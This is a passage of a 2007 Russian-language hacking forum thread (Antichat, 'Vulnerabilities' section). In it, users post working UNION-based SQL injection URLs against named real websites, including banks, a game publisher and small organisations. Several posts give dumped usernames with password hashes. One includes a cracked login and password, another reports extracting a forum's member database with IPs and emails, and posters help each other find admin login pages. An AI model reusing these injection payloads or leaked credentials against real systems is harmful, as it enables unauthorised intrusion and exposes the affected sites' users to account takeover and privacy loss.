ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3271  
Старый 11.10.2007, 16:29
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

http://acc.com/php/cms/index.php?id=1/**/union/**/select/**/null,null,null,null/**/from/**/user--
 
Ответить с цитированием

  #3272  
Старый 11.10.2007, 17:18
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

DOS CREDO BANK


код:


http://www.credo.com.kg/news/?id=-8+union+select+1,cast(concat_ws(0x3a,version(),use r(),database())+as+binary)/*

! HELP !

5 мускул, но вывода колонок и таблиц через information_schema так и не смог! Что тут за заморочка?

Последний раз редактировалось fobofob; 11.10.2007 в 17:20..
 
Ответить с цитированием

  #3273  
Старый 11.10.2007, 19:21
te$t
Познающий
Регистрация: 08.08.2007
Сообщений: 73
Провел на форуме:
167396

Репутация: 91
По умолчанию

Код:
http://www.ubisoft.ru/games/game.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11+from+news/*
 
Ответить с цитированием

  #3274  
Старый 11.10.2007, 23:55
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

starz.ru
http://starz.ru/photo/?celeb=-64+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3/*


uralmoto.ru логин/хеш/уин
http://uralmoto.ru/stories.php?sid=-1'+union+select+1,2,3,4,5,concat(username,0x3a,use r_password,0x3a,user_icq),7,8,9,10,11,12+from+phpb b_users+limit+1,1/*

надеюсь не бояны ))
 
Ответить с цитированием

  #3275  
Старый 12.10.2007, 02:22
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию

http://sc-ufa.uraltb.ru/?id=99999+union+select+1,2,3/*
 
Ответить с цитированием

  #3276  
Старый 12.10.2007, 07:17
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Цитата:
_http://www.lanchesterbrassband.org.uk/news.php?id=7+union+select+1,concat_ws(0x3a,name,p assword),3,4,5,6+from+users+limit+1,3
хеши:
member:4e4d6c332b6fe62a63afe56171fd3725 расшифровал:haha
ian:919b720497e91197077a706775c5a9ad
adam:2e456fdbaadea50686a5809d9c540243
http://www.lanchesterbrassband.org.uk/login.php member:haha
 
Ответить с цитированием

  #3277  
Старый 12.10.2007, 09:45
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Заказываем девочек ...


код:


http://elit.tv/index.phtml?id=-42+union+select+1,concat_ws(0x3a,id,name,passwd),3 ,4,5,6,7,8,9,10,11+from+admin_users/*


...но для начала нужно найти админку
 
Ответить с цитированием

  #3278  
Старый 12.10.2007, 10:33
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

ЗАО "МОССТРОЙЭКОНОМБАНК"
Цитата:
http://www.mseb.ru/news/?act=show_news&id=-62+union+select+1,2,table_na me,4,5,6,7,8,9+from+information_schema.tables+limi t+1 ,99/*
Версия: 5.0.41-log
Цитата:
http://www.mseb.ru/news/?act=show_news&id=-62+union+select+1,2,con cat(user,0x3A, pass),4,5,6,7,8,9+from+auth_user/*
usoftadmin:f02539ca4eff95f24c00d82eb62e275e:xtrfen
mseb:6d390ae485e95ceac9ce280f02d0c409
Жаль обминку найти не смог (
 
Ответить с цитированием

  #3279  
Старый 12.10.2007, 10:47
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

2 0nep@t0p
http://www.mseb.ru/adm/login.php?ref=%2Fadm%2Findex.php вот админка
 
Ответить с цитированием

  #3280  
Старый 12.10.2007, 13:36
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),i cq_number,concat(ip_address,0x3a,email),7,8+from+v itz_forums.ibf_members/*

Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT.XYZ